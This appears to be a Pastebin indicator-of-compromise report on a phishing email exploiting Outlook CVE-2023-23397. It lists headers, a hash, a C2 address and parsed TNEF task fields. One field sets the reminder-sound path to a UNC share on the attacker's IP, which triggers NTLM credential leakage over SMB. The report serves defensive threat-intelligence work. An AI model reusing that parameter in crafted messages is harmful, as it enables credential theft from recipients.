VRad

#outlook_eop_160323

Mar 16th, 2023 (edited)
2,038
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.15 KB | None | 0 0
  1. #IOC #OptiData #VR #MSOutlook #EoP #SMB #NTLM
  2.  
  3. https://pastebin.com/FJDa0MA8
  4.  
  5. FAQ:
  6. https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
  7. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
  8. https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224
  9. https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/
  10.  
  11. attack_vector
  12. --------------
  13. email attach lrmng.txt > CVE-2023-23397 exploit > Outlook Task > \\85.195.206.7\lrmng\ > NTLM negotiation request > exfil of NTLM credentials
  14.  
  15. # # # # # # # #
  16. email_headers
  17. # # # # # # # #
  18. Return-Path: <officedip@alsaeedi.com>
  19. Received: from semf03.mfg.siteprotect.com (semf03.mfg.siteprotect.com [64.26.60.166])
  20. Received: from smtpauth02.mfg.siteprotect.com ([64.26.60.151])
  21. Received: from [127.0.0.1] (unknown [85.195.206.7])
  22. Content-Type: application/ms-tnef; name=lrmng.txt
  23. Content-Transfer-Encoding: base64
  24. Content-Disposition: attachment; filename=lrmng.txt
  25. From: officedip@alsaeedi.com
  26. Subject: Alarm!
  27. Message-ID: <37a46b6c-fe82-4e9f-a6c2-29a2d49fe99a@alsaeedi.com>
  28. Date: Thu, 16 Mar 2023 09:50:29 +0000
  29.  
  30. # # # # # # # #
  31. files
  32. # # # # # # # #
  33.  
  34. SHA-256 562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444
  35. File name lrmng.txt [CVE-2023-23397 exploit]
  36. File size 6.94 KB (7108 bytes)
  37.  
  38. # # # # # # # #
  39. activity
  40. # # # # # # # #
  41.  
  42. PL_SCR email attach
  43.  
  44. C2 85.195.206.7:445
  45.  
  46. netwrk
  47. --------------
  48. 85.195.206.7 445 SMB Negotiate Protocol Request
  49.  
  50. comp
  51. --------------
  52. System 85-195-206-7.init7.net 445 ESTABLISHED
  53.  
  54. proc
  55. --------------
  56. C:\Program Files (x86)\Microsoft Office\Office*\OUTLOOK.EXE
  57.  
  58. persist
  59. --------------
  60. n/a
  61.  
  62. drop
  63. --------------
  64. n/a
  65.  
  66.  
  67. # # # # # # # #
  68. additional info
  69. # # # # # # # #
  70.  
  71. TNEF parsed
  72. --------------
  73. "attributes": {
  74. "Date Modified": "2022-06-07 07:56:42",
  75. "Date Received": "2023-02-07 09:54:49",
  76. "Date Sent": "2023-02-07 09:54:49",
  77. "From": [
  78. "Joe.Smith@cert.au",
  79. "EX",
  80. "/o=BLIND/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au"
  81. ],
  82. "Message Class": "IPM.Task",
  83. "Message ID": "14DBDC85E2926A4291B27D5C13103DBE",
  84. "Message Status": 33,
  85. "Priority": 1,
  86. "Subject": "ALARM!"
  87. },
  88. "extended_attributes": {
  89. "0x8103": false,
  90. "0x8112": 2,
  91. "0x8113": 1,
  92. "0x811c": false,
  93. "0x8123": -1000,
  94. "0x8124": false,
  95. "0x8127": "",
  96. "0x812a": 0,
  97. "0x812c": false,
  98. "0x851e": true,
  99. "0x851f": "\\\\85.195.206.7\\lrmng",
  100. "0x8580": "Joe.Smith@cert.au",
  101. "0x8581": "00000002\u0001/o=CERT/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au",
  102. "0x85eb": 1033,
  103. "InTransitMessageCorrelator": "3\ufffd\ufffd\ufffd(u$K\ufffdus>\ufffdw(\ufffd",
  104. "MAPI_ACCESS": 7,
  105. "MAPI_ACCESS_LEVEL": 1,
  106. "MAPI_AGING_DONT_AGE_ME": false,
  107. "MAPI_ALTERNATE_RECIPIENT_ALLOWED": true,
  108. "MAPI_ANNIVERSARY_EVENT_ENTRY_ID": "",
  109. "MAPI_AUTO_LOG": 0,
  110. "MAPI_BIRTHDAY_EVENT_ENTRY_ID": "Joe.Smith@cert.au",
  111. "MAPI_CHANGE_KEY": "\ufffd\u001e'M\u000e\ufffd\ufffdH\ufffd\ufffdK\ufffd1\ufffd-o\u0000\u0000\u0000\u0000\u001a\ufffd",
  112. "MAPI_CLIENT_SUBMIT_TIME": "2023-02-07 16:54:49.696000",
  113. "MAPI_CONTACT_USER_FIELD1": 0,
  114. "MAPI_CONVERSATION_INDEX": "\u0001\ufffd;\u0014\ufffdK>\ufffd\ufffd\ufffd\u0013x@\ufffd\ufffd\b\ufffd/\ufffd\ufffd\ufffd\ufffd",
  115. "MAPI_CONVERSATION_INDEX_TRACKING": true,
  116. "MAPI_CONVERSATION_TOPIC": "LGBTQ+",
  117. "MAPI_CREATION_TIME": "2023-02-07 16:53:29.210000",
  118. "MAPI_CURRENT_VERSION_NAME": "16.0",
  119. "MAPI_DELETE_AFTER_SUBMIT": false,
  120.  
  121.  
  122. # # # # # # # #
  123. VT & Intezer
  124. # # # # # # # #
  125. https://www.virustotal.com/gui/file/562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444/details
  126.  
  127.  
  128. VR
Add Comment
Please, Sign In to add comment